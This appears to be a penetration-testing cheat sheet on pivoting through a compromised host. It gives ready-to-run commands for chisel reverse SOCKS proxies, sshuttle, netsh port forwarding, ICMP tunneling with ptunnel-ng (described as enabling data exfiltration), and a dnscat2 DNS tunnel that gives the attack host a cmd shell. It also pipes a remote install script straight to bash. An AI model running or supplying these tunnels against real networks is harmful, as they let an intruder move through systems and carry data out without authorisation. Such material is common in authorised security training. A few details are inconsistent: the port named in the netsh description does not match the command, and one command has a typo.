More Techniques

There are times when the pivot host is a Windows system instead of Linux. In such cases, we need alternatives to SSH for port forwarding and tunneling. Sometimes, we may not have a proper shell but only a reverse shell. In these scenarios, static binary tricks or other techniques might be necessary.

This page provides a collection of tools and methods for port forwarding and tunneling during pivoting.

Techniques

chisel

Github Repo Link

# Quick Install the Binary
curl https://i.jpillora.com/chisel! | bash

# Copy to current directory to transfer anywhere else (linux)
cp /usr/local/bin/chisel ./chisel-binary

# .exe Binary
### ==>> https://github.com/jpillora/chisel/releases => Releases section
### contains binaries for lots of architectures and OSes.

# Build Binary From Source
git clone https://github.com/jpillora/chisel.git
cd chisel && go build

## Build Chisel Binary Compact (Reduces from 10M to 2.7M)
git clone https://github.com/jpillora/chisel.git
cd chisel && go build -ldflags="-s -w" -trimpath 
upx --best --lzma chisel ## UPX Pack the binary

# Build Static Binary [Not Dynamically Linked]
git clone https://github.com/jpillora/chisel.git && cd chisel
CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -a -ldflags '-extldflags "-static"'

### [[[---LINUX/WINDOWS---]]]

##### ------BIND------- #####
# From Pivot-Host
./chisel server -v -p 1337 --socks5 # NOTE THE "SOCKS5"

# From Attack-Host 
./chisel client -v <PIVOT-HOST-IP>:1337 socks

##### ------REVERSE------- #####
# From Attack-Host
./chisel server --reverse -v -p 1337 --socks5
./chisel server -p 1337 --reverse --socks5 127.0.0.1:1080 ## TO CHANGE PORT of SOCKS

# From Pivot-Host
./chisel client -v <TUN0-OF-ATTACK-HOST>:1337 R:socks

## Note Add following in /etc/proxychains.conf
socks5 127.0.0.1 1080

# Access the target
proxychains firefox http://192.168.1.7:8080/
proxychains nmap -T4 192.168.1.7 -Pn
proxychains curl http://192.168.1.7:8080/

info

Use proxychains4 -q nmap 192.168.1.7 to remove unwanted terminal outputs.

sshuttle

### [[[---LINUX---]]]
# Install using:
sudo apt-get install sshuttle

# From Attack Host:
sudo sshuttle -r rezydev@10.10.10.10 192.168.1.0/24 -v
# this tool only works for pivoting over ssh but do not need proxychains

# Nmap/Curl
curl http://192.168.1.3
nmap -sCV curl 192.168.1.3 -vv -T4

Netsh.exe

### [[[---WINDOWS---]]]
netsh.exe interface portproxy add v4tov4 listenport=1337 listenaddress=10.10.10.10 connectport=3389 connectaddress=192.168.1.7

The command forwards traffic from port 8080 on (10.10.10.10)<PIVOT-HOST-IP> to port 3389 on 192.168.1.7 for RDP access.

To verify:

netsh.exe interface portproxy show v4tov

ptunnel-ng

# ICMP tunneling hides traffic in ping requests and responses,
# enabling data exfiltration and external pivot tunnels when
# firewalls allow ping traffic.

# Link: https://github.com/utoni/ptunnel-ng

###----INSTALL----###
git clone https://github.com/utoni/ptunnel-ng.git
sudo ./autogen.sh

# Target-Host
sudo ./ptunnel-ng -r<TARGET-HOST-IP> -R22

# Attack-Host
sudo ./ptunnel-ng -p<TARGET-HOST-IP> -l2222 -r<TARGET-HOST-IP> -R22

DNS Tunneling (Dnscat2)

It also has PowerShell alternative for this but it is currently archived project.

## Server (attack-host)
sudo ruby dnscat2.rb --dns host=<TUN0-IP>,port=53,domain=rezydev.local --no-cache

## Client (pivot-host)
Start-Dnscat2 -DNSserver 10.10.10.10 -Domain rezydev.local -PreSharedSecret <SECRET-FROM-CLIENT> -Exec cmd

Techniques​

chisel​

sshuttle​

Netsh.exe​

ptunnel-ng​

DNS Tunneling (Dnscat2)​